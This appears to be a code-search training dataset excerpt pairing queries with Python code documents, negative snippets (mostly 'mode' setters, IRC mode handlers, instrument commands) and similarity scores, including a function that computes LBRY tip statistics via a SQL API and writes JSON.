(days since 2017-01-01)") plt.ylabel("New {mode} added each day".format(mode=string)) subset = counts[-31:-1] plt.title("Recent average rate (last 30 days) = {n} {mode} per day.".\ format(n=int(np.sum(time.time() - times <= 30.0*86400.0)/30.0), mode=string)) plt.gca().tick_params(labelright=True) # Year lines for year in new_years: plt.axvline(year, color="r", alpha=0.8, linestyle="--") # MH line plt.axvline(890.0, linestyle="dotted", linewidth=2, color="g") # plt.gca().set_yticks([1.0, 10.0, 100.0, 1000.0, 10000.0]) # plt.gca().set_yticklabels(["1", "10", "100", "1000", "10000"]) plt.legend() plt.savefig("{mode}.svg".format(mode=mode), bbox_inches="tight") plt.savefig("{mode}.png".format(mode=mode), bbox_inches="tight", dpi=70) print("Figure saved to {mode}.svg and {mode}.png.".format(mode=mode)) if show: plt.show()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mode (self, mode) :\r\n self.mode_ = mode", "def set_mode(self, mode):\n\t\tif mode not in (self.MODE_PREVIEW, self.MODE_ANALYZE, self.MODE_SEND):\n\t\t\traise ValueError('mode must be one of the MODE_* constants')\n\t\tself._mode = mode\n\t\tif mode == self.MODE_ANALYZE:\n\t\t\tself.attachment_images = {}", "def handle_fan_mode_received(msg: ReceiveMessage) -> None:\n handle_mode_received(\n msg,\n CONF_FAN_MODE_STATE_TEMPLATE,\n \"_attr_fan_mode\",\n CONF_FAN_MODE_LIST,\n )", "def mode(self) -> Mode:\n ...", "def mode(self, mode: Optional[int] = None) -> Optional[int]:\n ...", "def set_mode(self, mode):\n SetMode_srv = SetModeRequest(0, mode)\n response = self.set_mode_client(SetMode_srv)\n if response.mode_sent:\n rospy.loginfo(CGREEN2 + \"SetMode Was successful\" + CEND)\n return 0\n else:\n rospy.logerr(CRED2 + \"SetMode has failed\" + CEND)\n return -1", "def mode(self, mode_type: str):\r\n self._mode = mode_type.lower()\r\n self.mode_hist.append(mode_type)\r\n\r\n if self.mode_hist[-2] != mode_type and self._daq:\r\n msg = Message(\"mode\", mode_type, self.checksum).message_bytes\r\n self._daq.asynch.transmit(msg)", "def setMode(self, mode):\n self.mode = mode\n if self.mode == 0:\n self.setDrawingMode()\n elif self.mode == 1:\n self.setConstructionMode()\n elif self.mode == 2:\n self.setDisplayMode()\n self.context.text.append(\"mode: \" + self.messages[self.mode])", "def setMode(self,mode):\n self.mode=mode\n if self.mode==0:\n self.setDrawing()\n elif self.mode==1:\n self.setConstruction()\n elif self.mode==2:\n self.setDisplay()\n self.context.text.append(\"mode: \"+self.messages[self.mode])", "def dispatch_mode_for_channel(self, target, mode):\n channel = target[1:]\n assert channel in self.server.channels\n self.server.channels[channel].mode(self, mode)", "def test_mixedModes(self):\n self._sendModeChange(\"+osv\", \"a_user another_user\")\n self._checkModeChange([(True, \"osv\", (\"a_user\", None, \"another_user\"))])\n self._sendModeChange(\"+v-os\", \"a_user another_user\")\n self._checkModeChange(\n [(True, \"v\", (\"a_user\",)), (False, \"os\", (\"another_user\", None))]\n )", "def mode(self, channel, target, command=\"\"):\n time.sleep(1)\n self.s.send(\"MODE %s %s%s\\n\" % (channel, target, (command and (\" \" + command))))\n logger.log(\"MODE %s %s%s\" % (channel, target, (command and (\" \" + command)))).LogSend()", "def test_userMode(self):\n target = self.client.nickname\n # Mode \"o\" on channels is supposed to take a parameter, but since this\n # is not a channel this will not cause an exception.\n self._sendModeChange(\"+o\", target=target)\n self._checkModeChange([(True, \"o\", (None,))], target=target)\n\n def getUserModeParams():\n return [\"Z\", \"\"]\n\n # Introduce our own user mode that takes an argument.\n self.patch(self.client, \"getUserModeParams\", getUserModeParams)\n\n self._sendModeChange(\"+Z\", \"an_arg\", target=target)\n self._checkModeChange([(True, \"Z\", (\"an_arg\",))], target=target)", "def defaultDecoder(self, message, server):\n mode = message.getArg(OPENID_NS, 'mode')\n fmt = \"Unrecognized OpenID mode %r\"\n raise ProtocolError(message, text=fmt % (mode, ))", "def mode(self, mode):\n\n self._mode = mode", "def mode(self, mode):\n\n self._mode = mode", "def mode(self, mode):\n\n self._mode = mode", "def irc_MODE(self, prefix, params):\n user = re.match(self.user_regex, prefix)\n channel = params[0]\n mode = ' '.join(params[1:])\n\n # Sent by network, not a real user\n if not user:\n self.logger.debug(\n \"%s set mode on %s (%s)\" 
% (prefix, channel, mode)\n )\n return\n\n self.logger.debug(\n \"%s!%s@%s set mode on %s (%s)\" %\n (user.group(1), user.group(2), user.group(3), channel, mode)\n )\n\n # Can get called during connection, in which case EventManager won't be\n # initialized yet\n if self.event_manager:\n self.event_manager.fire(\"irc.mode\", user, channel, mode)", "def mode(self):\r\n pass", "def cmd_mode (self, line):\r\n if line[1] in 'sS':\r\n # f == 'file'\r\n self.respond ('200 MODE S Ok')\r\n else:\r\n self.respond ('502 Unimplemented MODE type')", "def mode_to_network_class(mode):\n if mode in ['flat', 'signals']:\n return FlatPolicy\n elif 'skills' in mode:\n return SkillsPolicy\n elif 'film' in mode:\n return FilmPolicy\n elif mode == 'regression':\n return Regression\n else:\n raise NotImplementedError('mode {} is unknown'.format(mode))", "def is_valid_mode(mode: str) -> bool:\n return mode in (TEST, EASY, HARD)", "def _check_mode_valid(mode):\n if (mode != model_fn.ModeKeys.TRAIN and mode != model_fn.ModeKeys.INFER and\n mode != model_fn.ModeKeys.EVAL):\n raise ValueError(\"mode=%s unrecognized.\" % str(mode))", "def get_mode_parameter(mode):\n if mode == 'job':\n return 'cli'\n elif mode == 'serve':\n return 'serving'\n else:\n return mode", "def __init__(self, mode=0, amp=0., pw=0., period=.001):\n self.mode = mode\n self.amp = amp # uA, range: [0, 24000]. Use amp=0 to stop the channel\n self.period = period # sec, range: [0, 10.23]\n self.pulse_width = pw # sec", "def _sendModeChange(self, msg, args=\"\", target=None):\n if target is None:\n target = \"#chan\"\n message = \":Wolf!~wolf@yok.utu.fi MODE {} {} {}\\r\\n\".format(target, msg, args)\n self.client.dataReceived(message)", "def __check_mode(self):\n self.mode[\"auto_mode\"] = self.communications.get_mode()", "def set_mode(self, mode):\n if mode in self.MODES:\n self.mode = self.MODES[mode]", "def mode(self, mode):\n self.set_mode(mode)", "def _assert_valid_mode(mode:str):\n if not mode in [_TRAIN, _EVAL, _PREDICT]:\n raise ValueError(\"Invalid mode.\")", "def mode(self, target, *data):\n self.send_line('MODE %s %s' % (target, ' '.join(data)), nowait=True)", "def get_speaker_mode_channels(self, mode):\n channels = c_int()\n self._call_fmod(\n \"FMOD_System_GetSpeakerModeChannels\", mode.value, byref(channels)\n )\n return channels.value", "def change_mode(self, mode):\r\n self.update_enrollment(mode=mode)", "def notify_mode_change(self, mode):\n pass", "def set_mode(self, mode):\n print('set_mode', mode)\n self._mode = int(mode)", "def handle_current_mode_received(msg: ReceiveMessage) -> None:\n handle_mode_received(\n msg, CONF_MODE_STATE_TEMPLATE, \"_attr_hvac_mode\", CONF_MODE_LIST\n )", "def cmd_mode(args):", "def set_mode(self, mode):\n if mode == 'train':\n self.net.train()\n elif mode == 'eval':\n self.net.eval()\n else:\n raise ValueError(\n \"Got invalid mode '{}'. 
Valid options are 'train' and 'eval'.\".format(mode))", "def get_requested_mode(self, request_dict):\r\n if 'audit_mode' in request_dict:\r\n return 'audit'\r\n if 'certificate_mode' and request_dict.get(\"honor-code\"):\r\n return 'honor'\r\n if 'certificate_mode' in request_dict:\r\n return 'verified'", "def mode(self, value):\n self._set_attr('mode', value)", "def set_mode(self, mode='List'):\r\n \r\n #If we choose list mode \r\n if mode.lower() == 'list':\r\n #First choose a list if there was no, otherwise SMA100B is mad\r\n #To know the available list, the query is 'SOUR1:LIST:CAT?'\r\n self.write('SOUR1:LIST:SEL \"/var/user/list1.lsw\"') \r\n \r\n self.write('OUTP1:STAT ON') #Somehow the SMA100B wants the RF to be ON for switching into list mode.\r\n self.write('SOUR1:LIST:MODE STEP') #Make Step mode in order to not automatically sweep all the frequencies\r\n self.write('SOURce1:FREQuency:MODE LIST')\r\n else:\r\n #CW and FIXed are synonyms for SMA100B\r\n self.write('SOURce1:FREQuency:MODE CW')", "def set_mode(self, mode='List'):\r\n \r\n #If we choose list mode \r\n if mode.lower() == 'list':\r\n #First choose a list if there was no, otherwise SMA100B is mad\r\n #To know the available list, the query is 'SOUR1:LIST:CAT?'\r\n self.write('SOUR1:LIST:SEL \"/var/user/list1.lsw\"') \r\n \r\n self.write('OUTP1:STAT ON') #Somehow the SMA100B wants the RF to be ON for switching into list mode.\r\n self.write('SOUR1:LIST:MODE STEP') #Make Step mode in order to not automatically sweep all the frequencies\r\n self.write('SOURce1:FREQuency:MODE LIST')\r\n else:\r\n #CW and FIXed are synonyms for SMA100B\r\n self.write('SOURce1:FREQuency:MODE CW')", "def __get_verify_mode(self):\n ...", "def _get_mode(self):\n raise NotImplementedError", "def _get_mode():\n return context.get_context('mode')", "def mode(self) -> str:\r\n ...", "def setMode(self, mode):\n if mode == 0 or mode == 1:\n with self.lock:\n self.mode = mode\n else:\n raise FliError(\"FLISetCameraMode failed\")", "def _mode_key(guild_id: int) -> str:\n return f\"mode/{guild_id}\"", "def handle_mode_received(\n msg: ReceiveMessage, template_name: str, attr: str, mode_list: str\n ) -> None:\n payload = self.render_template(msg, template_name)\n\n if payload not in self._config[mode_list]:\n _LOGGER.error(\"Invalid %s mode: %s\", mode_list, payload)\n else:\n setattr(self, attr, payload)\n get_mqtt_data(self.hass).state_write_requests.write_state_request(self)", "def _setmode(self, mode=None):\n if mode is None:\n return self._mode\n if mode not in [\"standard\", \"logo\", \"world\"]:\n return\n self._mode = mode\n if mode in [\"standard\", \"world\"]:\n self._angleOffset = 0\n self._angleOrient = 1\n else: # mode == \"logo\":\n self._angleOffset = self._fullcircle/4.\n self._angleOrient = -1", "def switch_mode(guild_id: int, mode: str):\n key = _mode_key(guild_id)\n db[key] = mode\n if mode == fixtures.chat:\n del db[key]", "def set_mode(self, mode: str) -> None:\n # Not all programs are fully supported by the current\n # OpenInterface API version. 
The known restricitons are:\n # - The 'Calibration' and 'TightnessTest' programms cannot\n # be started through the API.\n # - The 'Dry' program does not expose all it's parameters\n # (see github.com/buchi-labortechnik-ag/openinterface_rotavapor/issues/1)\n return self.send(self.cmd.SET_MODE, mode)", "def validate_mode(mode, operator_tag, is_sha_digest):\n version_supports_restricted = check_if_tag_supports_restricted(operator_tag, is_sha_digest)\n if mode == MODE_RESTRICTED and not version_supports_restricted:\n raise ValueError(\"{} is not supported for this version, please use {}\".format(MODE_RESTRICTED, MODE_ALL))", "def get_mode(self):\r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'CW': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def get_mode(self):\r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'CW': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def test_set_mode(self):\n context = Context(SSLv23_METHOD)\n assert MODE_RELEASE_BUFFERS & context.set_mode(MODE_RELEASE_BUFFERS)", "def competition_mode(self, on):\n pass", "def competition_mode(self, on):\n pass", "def set_mode(self, mode='List'):\r\n _debug('simq03b_api.set_mode')\r\n \r\n #If we choose list mode \r\n if mode.lower() == 'list':\r\n #First choose a list if there was no, otherwise SMA100B is mad\r\n #To know the available list, the query is 'SOUR1:LIST:CAT?'\r\n self.write('SOUR1:LIST:SEL \"/var/user/list1.lsw\"') \r\n \r\n self.write('OUTP1:STAT ON') #Somehow the SMA100B wants the RF to be ON for switching into list mode.\r\n self.write('SOUR1:LIST:MODE STEP') #Make Step mode in order to not automatically sweep all the frequencies\r\n self.write('SOURce:FREQuency:MODE LIST')\r\n else:\r\n #CW and FIXed are synonyms for SMA100B\r\n self.write('SOURce:FREQuency:MODE CW')", "def validate(self, mode): # pragma: no cover\n pass", "def manage_channels(_) -> int:\n return 1 << 4", "def manage_channels(_) -> int:\n return 1 << 4", "def set_mode(self, mode=0, detection_param=0):\r\n return self._arm.set_mode(mode=mode, detection_param=detection_param)", "def modes(self, modes):\n\n self._modes = modes", "def modes(self, modes):\n\n self._modes = modes", "def mode(self):\n return self._lift(\"mode\")", "def mode(self):\n return self._data.get('mode', None)", "def get_mode(self):\r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'FIX': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def mode_remote(self):\n self.send(\"!MR\")\n # time.sleep(2.0)\n # No feedback, so query to verify set\n got = self.get_mode()\n assert got == \"R\", got", "def test_oneModeParameter(self):\n self._sendModeChange(\"+o\", \"a_user\")\n self._checkModeChange([(True, \"o\", (\"a_user\",))])\n self._sendModeChange(\"-o\", \"a_user\")\n self._checkModeChange([(False, \"o\", (\"a_user\",))])", "def main(ctx):\n\n print(\"Mode:\")", "def mode(self) -> Optional[str]:\n return pulumi.get(self, \"mode\")", "def mode(self) -> Optional[str]:\n return pulumi.get(self, \"mode\")", "def _checkMode(mode):\n\n if not isinstance(mode, str):\n raise TypeError('The {0} should be a string. 
Given: {1!r}'.format(\"mode\", mode))\n\n if mode not in [MODE_RTU, MODE_ASCII]:\n raise ValueError(\"Unreconized Modbus mode given. Must be 'rtu' or 'ascii' but {0!r} was given.\".format(mode))", "def test_mode_invalid(mode):\n # Test errors on construction\n with pytest.raises(TypeConversionError):\n gay_berne = md.pair.aniso.GayBerne(nlist=md.nlist.Cell(buffer=0.4),\n default_r_cut=2.5,\n mode=mode)\n gay_berne = md.pair.aniso.GayBerne(nlist=md.nlist.Cell(buffer=0.4),\n default_r_cut=2.5)\n gay_berne.params[('A', 'A')] = {'epsilon': 1, 'lpar': 0.5, 'lperp': 1.0}\n # Test errors on setting\n with pytest.raises(TypeConversionError):\n gay_berne.mode = mode", "def set_process_channel_mode(\n self, mode: ProcessChannelModeStr | core.QProcess.ProcessChannelMode\n ):\n self.setProcessChannelMode(PROCESS_CHANNEL_MODES.get_enum_value(mode))", "def test_getChannelModeParams(self):\n add, remove = map(sorted, self.client.getChannelModeParams())\n self.assertEqual(add, [\"b\", \"h\", \"k\", \"l\", \"o\", \"v\"])\n self.assertEqual(remove, [\"b\", \"h\", \"o\", \"v\"])\n\n def removeFeature(name):\n name = \"-\" + name\n msg = \"are available on this server\"\n self._serverTestImpl(\"005\", msg, \"isupport\", args=name, options=[name])\n self.assertIdentical(self.client.supported.getFeature(name), None)\n self.client.calls = []\n\n # Remove CHANMODES feature, causing getFeature('CHANMODES') to return\n # None.\n removeFeature(\"CHANMODES\")\n add, remove = map(sorted, self.client.getChannelModeParams())\n self.assertEqual(add, [\"h\", \"o\", \"v\"])\n self.assertEqual(remove, [\"h\", \"o\", \"v\"])\n\n # Remove PREFIX feature, causing getFeature('PREFIX') to return None.\n removeFeature(\"PREFIX\")\n add, remove = map(sorted, self.client.getChannelModeParams())\n self.assertEqual(add, [])\n self.assertEqual(remove, [])\n\n # Restore ISUPPORT features.\n self._sendISUPPORT()\n self.assertNotIdentical(self.client.supported.getFeature(\"PREFIX\"), None)", "def set_mode(msg_mode, who=None):\n global output_mode\n global LEVELS\n global loggers\n\n #Global mode\n if (output_mode == None):\n output_mode = \"WARN\"\n if (who == None):\n output_mode = msg_mode\n __create_logger(GENERIC_LOG_NAME, LEVELS[output_mode])\n\n #Individual mode\n if (who != None and who not in loggers):\n __create_logger(who, LEVELS[msg_mode])", "def test_modes_for_course_multiple(self):\r\n mode1 = Mode(u'honor', u'Honor Code Certificate', 0, '', 'usd', None)\r\n mode2 = Mode(u'verified', u'Verified Certificate', 0, '', 'usd', None)\r\n set_modes = [mode1, mode2]\r\n for mode in set_modes:\r\n self.create_mode(mode.slug, mode.name, mode.min_price, mode.suggested_prices)\r\n\r\n modes = CourseMode.modes_for_course(self.course_key)\r\n self.assertEqual(modes, set_modes)\r\n self.assertEqual(mode1, CourseMode.mode_for_course(self.course_key, u'honor'))\r\n self.assertEqual(mode2, CourseMode.mode_for_course(self.course_key, u'verified'))\r\n self.assertIsNone(CourseMode.mode_for_course(self.course_key, 'DNE'))", "def set_input_channel_mode(\n self, mode: InputChannelModeStr | core.QProcess.InputChannelMode\n ):\n self.setInputChannelMode(INPUT_CHANNEL_MODES.get_enum_value(mode))", "def setMode(self, newmode=None):\n if newmode==None and self.mode: return\n \n # find it in my dictionary\n for k,v in self.items():\n if k.lower() == \"mode\":\n if newmode:\n self.mode = newmode\n self[k] = str(self.mode)\n else:\n self.mode = int(v)\n \n # it wasn't in the dictionary\n if newmode and not self.mode:\n self.mode = newmode\n self[\"MODE\"] 
= str(self.mode)\n \n if not self.mode:\n raise NetworkException(\"Supplink mode not set: \" + str(self))", "def test_switch_channels(self):\n\t\t# not available yet, experimental\n\t\tpass", "def setMode(self, request, context):\n \n self.vehicle.mode = VehicleMode(str(request.mode))\n self.vehicle.wait_ready('mode')\n \n return droneconnect_pb2.Null()", "def get_mode(self):\r\n return self.mode", "def command(self, value):\n for ii in range(0, len(exposure_mode_names)):\n if value == exposure_mode_names[ii]: break\n self.tcp_comms.tcp_params.exposureMode = ii\n self.tcp_comms.send_exposure_mode(self.tcp_comms.tcp_params.exposureMode)", "def getModeString(self, mode):\n if mode == 0:\n return \"4 MHz\"\n elif mode == 1:\n return \"500 KHz\"\n else:\n raise FliError(\"FLIGetCameraModeString failed\")", "def get_mode(self, ):\n return self.get_parameter('mode')", "def set_mode(self, new_mode):\n\n\t\tself._log.info('Mode changed to: %s' % new_mode.name)\n\t\tself._mode = new_mode\n\t\tself._dump_configuration()\n\t\tself._remove_all_flow_records()", "def test_is_mode_upsellable(self, mode, is_upsellable):\n CourseModeFactory.create(mode_slug=mode, course_id=self.course.id)\n if mode == CourseMode.CREDIT_MODE:\n CourseModeFactory.create(mode_slug=CourseMode.VERIFIED, course_id=self.course.id)\n enrollment = CourseEnrollmentFactory(\n is_active=True,\n mode=mode,\n course_id=self.course.id,\n user=self.user\n )\n assert is_mode_upsellable(self.user, enrollment) is is_upsellable", "def command(self, value):\n global awb_mode_names\n for ii in range(0, len(awb_mode_names)):\n if value == awb_mode_names[ii]: break\n self.tcp_comms.send_awb_mode(ii)", "def bdev_ocf_set_cache_mode(client, name, mode):\n params = {\n 'name': name,\n 'mode': mode,\n }\n\n return client.call('bdev_ocf_set_cache_mode', params)", "def measurementMode(self, arg1, arg2):\n\t\tif (arg1 == \"SWE\" or arg1 == \"SAMP\" or arg1 == \"QSCV\") and (arg2 == \"SHOR\" or arg2 == \"LONG\" or arg2 == \"MED\"):\n\t\t\tself.write(\":PAGE:CHAN:MODE \" + arg1)\n\t\t\tself.write(\":PAGE:MEAS:MSET:ITIM \" + arg2)\n\t\telse:\n\t\t\tprint \"Invalid measurement mode or integration time. 
Exiting.\"\n\t\t\tsys.exit()\n\t\tpass", "def get_mode(self):\r\n _debug('simq03b_api.get_mode')\r\n \r\n s = self.query('FREQ:MODE?')\r\n if s == None: return None\r\n \r\n s = s.strip()\r\n if s == 'CW': return 'Fixed'\r\n elif s == 'LIST': return 'List'\r\n else:\r\n print('ERROR: Unknown mode '+str(s))\r\n return", "def setLastMicOnMode(self, channel, mode, unitCode=0):\n resp = self.XAPCommand('LMO', channel, mode, unitCode=unitCode)\n return str(resp)", "def test_tooFewModeParameters(self):\n self._sendModeChange(\"+o\")\n self._checkModeChange([])\n errors = self.flushLoggedErrors(irc.IRCBadModes)\n self.assertEqual(len(errors), 1)\n self.assertSubstring(\"Not enough parameters\", errors[0].getErrorMessage())", "def mode(self) -> str:\n return pulumi.get(self, \"mode\")", "def mode(self) -> str:\n return pulumi.get(self, \"mode\")", "def test_set_mode_wrong_args(self):\n context = Context(SSLv23_METHOD)\n with pytest.raises(TypeError):\n context.set_mode(None)", "def set_mode(self, mode_name, single_file_name=None):\n self.mode_name = mode_name\n\n if mode_name == 'training_model':\n # The mode that should be used when training or validing a model\n self.required_files = {'dose': ((1,) + self.patient_shape), # The shape of dose tensor\n 'ct': ((1,) + self.patient_shape), # The shape of ct tensor\n 'structure_masks': ((self.num_rois,) + self.patient_shape),\n # The shape of the structure mask tensor\n 'possible_dose_mask': ((1,) + self.patient_shape),\n # Mask of where dose can be deposited\n 'voxel_dimensions': (3,)\n # Physical dimensions (in mm) of voxels\n }\n elif mode_name == 'dose_prediction':\n # The mode that should be used when training or validing a model\n self.required_files = {'ct': ((1,) + self.patient_shape), # The shape of ct tensor\n 'structure_masks': ((self.num_rois,) + self.patient_shape),\n # The shape of the structure mask tensor\n 'possible_dose_mask': ((1,) + self.patient_shape),\n # Mask of where dose can be deposited\n 'voxel_dimensions': (3,) # Physical dimensions (in mm) of voxels\n }\n self.batch_size = 1\n print('Warning: Batch size has been changed to 1 for dose prediction mode')\n\n elif mode_name == 'predicted_dose':\n # This mode loads a single feature (e.g., dose, masks for all structures)\n self.required_files = {mode_name: ((1,) + self.patient_shape)} # The shape of a dose tensor\n\n elif mode_name == 'evaluation':\n # The mode that should be used evaluate the quality of predictions\n self.required_files = {'dose': ((1,) + self.patient_shape), # The shape of dose tensor\n 'structure_masks': ((self.num_rois,) + self.patient_shape),\n 'voxel_dimensions': (3,), # Physical dimensions (in mm) of voxels\n 'possible_dose_mask': ((1,) + self.patient_shape),\n }\n self.batch_size = 1\n print('Warning: Batch size has been changed to 1 for evaluation mode')\n\n else:\n print('Mode does not exist. Please re-run with either \\'training_model\\', \\'prediction\\', '\n '\\'predicted_dose\\', or \\'evaluation\\'')", "def set_autofeed_mode(self, mode):\n self._info(\"set_autofeed_mode\")\n self.parent.controller.set_autofeed_mode(mode)", "def register_mode(name, mode):\r\n if name in predefined_modes:\r\n raise ValueError('Mode name already taken: %s' % name)\r\n predefined_modes[name] = mode" ]
[ "0.60435784", "0.57577735", "0.55922663", "0.558323", "0.5573023", "0.554792", "0.55342835", "0.55269134", "0.55122584", "0.5491209", "0.5439935", "0.54331106", "0.5416338", "0.54091513", "0.5399344", "0.5399344", "0.5399344", "0.5391328", "0.53808737", "0.5337275", "0.53354955", "0.5328104", "0.5311297", "0.530364", "0.53007984", "0.52800363", "0.5273743", "0.52408254", "0.52401924", "0.522342", "0.51850295", "0.51683885", "0.51667887", "0.5165966", "0.5162725", "0.5161745", "0.51592237", "0.51561475", "0.5153731", "0.51503", "0.514999", "0.514999", "0.5144237", "0.5134591", "0.5133356", "0.51319003", "0.512197", "0.511353", "0.51107687", "0.51056856", "0.5094434", "0.50911057", "0.5056804", "0.50563836", "0.50563836", "0.5045686", "0.5041288", "0.5041288", "0.50346863", "0.50237304", "0.500687", "0.500687", "0.49931157", "0.4989987", "0.4989987", "0.49865615", "0.49797338", "0.49743864", "0.4967057", "0.49641076", "0.49503636", "0.49472153", "0.49472153", "0.49385637", "0.49385077", "0.49176043", "0.4914111", "0.49082533", "0.48988906", "0.48946843", "0.48925406", "0.48911852", "0.48882064", "0.48847458", "0.4878909", "0.4876399", "0.48673853", "0.48655593", "0.48624885", "0.48604652", "0.48589617", "0.4855421", "0.4844451", "0.48405126", "0.48353267", "0.4831732", "0.4831732", "0.481864", "0.48109645", "0.4806564", "0.48043504" ]
0.0
-1
Calculate tips over the past X amount of time and write JSON output
def aggregate_tips(): # The SQL query to perform now = time.time() print("Computing tip stats...", end="", flush=True) labels = ["30_days", "7_days", "24_hours", "1_hour"] windows = [30*86400.0, 7*86400.0, 1*86400.0, 3600.0] result = {} result["unix_time"] = now result["human_time_utc"] = str(datetime.datetime.utcfromtimestamp(int(now))) + " UTC" # Agrees with old method, but should it be SUM(amount)? query = "SELECT support_id, amount, time, claim_name, claim_id, is_nsfw, SUM(to_claim_address) tot FROM (SELECT support.id as support_id, support.support_amount amount,\ transaction.transaction_time time, claim.is_nsfw is_nsfw,\ claim.claim_id claim_id, claim.name claim_name,\ (CASE WHEN (output.address_list LIKE CONCAT('%25', claim_address, '%25')) THEN '1' ELSE '0' END) to_claim_address\ FROM claim\ INNER JOIN support ON support.supported_claim_id = claim.claim_id\ INNER JOIN transaction ON support.transaction_hash_id = transaction.hash\ INNER JOIN output ON transaction.hash = output.transaction_hash \ WHERE transaction.transaction_time > ({now} - {window})\ AND transaction.transaction_time <= {now}) AS result\ GROUP BY support_id, amount;".format(now=now, window=windows[0]) request = requests.get("https://chainquery.lbry.com/api/sql?query=" + query) the_dict = request.json() # Get tips into numpy array times = [] tips = [] is_tip = [] links = [] is_nsfw = [] for row in the_dict["data"]: times.append(float(row["time"])) tips.append(float(row["amount"])) links.append("https://open.lbry.com/" + str(row["claim_name"]) + ":"\ + str(row["claim_id"])) is_nsfw.append(row["is_nsfw"]) if row["tot"] > 0: is_tip.append(True) else: is_tip.append(False) times = np.array(times) tips = np.array(tips) is_tip = np.array(is_tip) links = np.array(links) is_nsfw = np.array(is_nsfw) # Write tips for i in range(len(labels)): keep = (times > (now - windows[i])) & is_tip _times = times[keep] _tips = tips[keep] _links = links[keep] _is_nsfw = is_nsfw[keep] result["num_tips_{label}".format(label=labels[i])] = len(_tips) result["lbc_tipped_{label}".format(label=labels[i])] = float(_tips.sum()) maxtip = 0 maxtip_link = None maxtip_is_nsfw = None if len(_tips) > 0: maxtip = float(_tips.max()) index = np.argmax(_tips) maxtip_link = _links[index] maxtip_is_nsfw = _is_nsfw[index] result["biggest_tip_{label}".format(label=labels[i])] = maxtip result["biggest_tip_{label}_link".format(label=labels[i])] = maxtip_link result["biggest_tip_{label}_is_nsfw".format(label=labels[i])] = bool(maxtip_is_nsfw) # Write supports for i in range(len(labels)): keep = (times > (now - windows[i])) & (~is_tip) _times = times[keep] _tips = tips[keep] _links = links[keep] _is_nsfw = is_nsfw[keep] result["num_supports_{label}".format(label=labels[i])] = len(_tips) result["lbc_supports_{label}".format(label=labels[i])] = float(_tips.sum()) maxtip = 0 maxtip_link = None maxtip_is_nsfw = None if len(_tips) > 0: maxtip = float(_tips.max()) index = np.argmax(_tips) maxtip_link = _links[index] maxtip_is_nsfw = _is_nsfw[index] result["biggest_support_{label}".format(label=labels[i])] = maxtip result["biggest_support_{label}_link".format(label=labels[i])] = maxtip_link result["biggest_support_{label}_is_nsfw".format(label=labels[i])] = bool(maxtip_is_nsfw) f = open("tips_stats.json", "w") f.write(json.dumps(result)) f.close() print("done. ", flush=True, end="")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_tip(meal_base, tip_rate):", "def time_taken(json_cutlist, laser):\r\n\tcutlist = json.loads(json_cutlist)\r\n\ttime = 0\r\n\tcoordinate_array = [0, 0]\r\n\tfor a in cutlist:\r\n\t\tif a[0] == \"jump\" or a[0] == \"mark\":\r\n\t\t\tcoordinate_array = [float(a[1]) - coordinate_array[0], float(a[2]) - coordinate_array[1]]\r\n\t\t\tmag = math.sqrt(coordinate_array[0]**2 + coordinate_array[1]**2)\r\n\t\t\tif a[0] == \"jump\":\r\n\t\t\t\ttime += mag/laser[\"jump_speed\"]\r\n\t\t\telse:\r\n\t\t\t\ttime += mag/laser[\"mark_speed\"]\r\n\t\t\tcoordinate_array = [float(a[1]), float(a[2])]\r\n\t\telif a[0] == \"z_abs\" or a[0] == \"z_rel\":\r\n\t\t\tzSet = float(a[1])\r\n\t\telif a[0] == \"c_abs\" or a[0] == \"c_rel\":\r\n\t\t\tcSet = float(a[1])\r\n\t\telif a[0] == \"a_abs\" or a[0] == \"a_rel\":\r\n\t\t\taSet = float(a[1])\r\n\t\telse:\r\n\t\t\tpass\r\n\treturn str(datetime.timedelta(seconds=int(time)))", "def time_plot(time_window):\n try:\n time_window = int(time_window)\n\n # make a connection and look up DB\n conn = sqlite3.connect(\"tweets.db\")\n c = conn.cursor()\n\n t = datetime.utcnow() - timedelta(seconds=time_window)\n\n time_lst = list(c.execute(\"SELECT created_at from tweets;\"))\n time_lst = np.array([i[0] for i in time_lst])\n\n count = str(np.sum(time_lst>t.strftime('%Y-%m-%d %H:%M:%S')))\n\n json_response = {\"status\":\"success\", \"data\":count}\n conn.close()\n except:\n json_response = {\"status\":\"failure\"}\n traceback.print_exc()\n conn.close()\n\n return json.dumps(json_response)", "def main(url: str, time_window_list: list) -> dict:\n page = 1\n data = {\"JT1\": 0, \"JT2\": 0, \"JT3\": 0, \"JT4\": 0, \"JT5\": 0}\n\n print(f\"Mining on {url.split('/')[5]}\")\n while True:\n\n response = requests.get(f\"{url}?page={page}&state=closed&access_token=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\")\n\n if response.status_code in range(300, 500):\n print(f\"Error: {response.json()['message']}\")\n exit(1)\n\n if len(response.json()) == 0:\n break\n\n if response.status_code == 200:\n # print(f\"{response.json()=}\")\n # print(f\"{len(response.json())}\")\n for issue in response.json():\n\n # if issues is not a pull request\n if 'pull_request' not in issue:\n closed_at = datetime.strptime(issue['closed_at'].split(\"T\")[0], \"%Y-%m-%d\")\n\n # JT1\n if time_window_list[0]['since'] <= closed_at <= time_window_list[0]['to']:\n data['JT1'] = data['JT1'] + 1\n\n # JT2\n elif time_window_list[1]['since'] <= closed_at <= time_window_list[1]['to']:\n data['JT2'] = data['JT2'] + 1\n\n # JT3\n elif time_window_list[2]['since'] <= closed_at <= time_window_list[2]['to']:\n data['JT3'] = data['JT3'] + 1\n\n # JT4\n elif time_window_list[3]['since'] <= closed_at <= time_window_list[3]['to']:\n data['JT4'] = data['JT4'] + 1\n\n # JT5\n elif time_window_list[4]['since'] <= closed_at <= time_window_list[4]['to']:\n data['JT5'] = data['JT5'] + 1\n page += 1\n print(f\"Closed: {data=}\")\n print(f\"Done!\")\n return data", "def get_chartdata():\n callback = bottle.request.query.get('callback')\n y_axis = bottle.request.query.get('y_axis').strip()\n 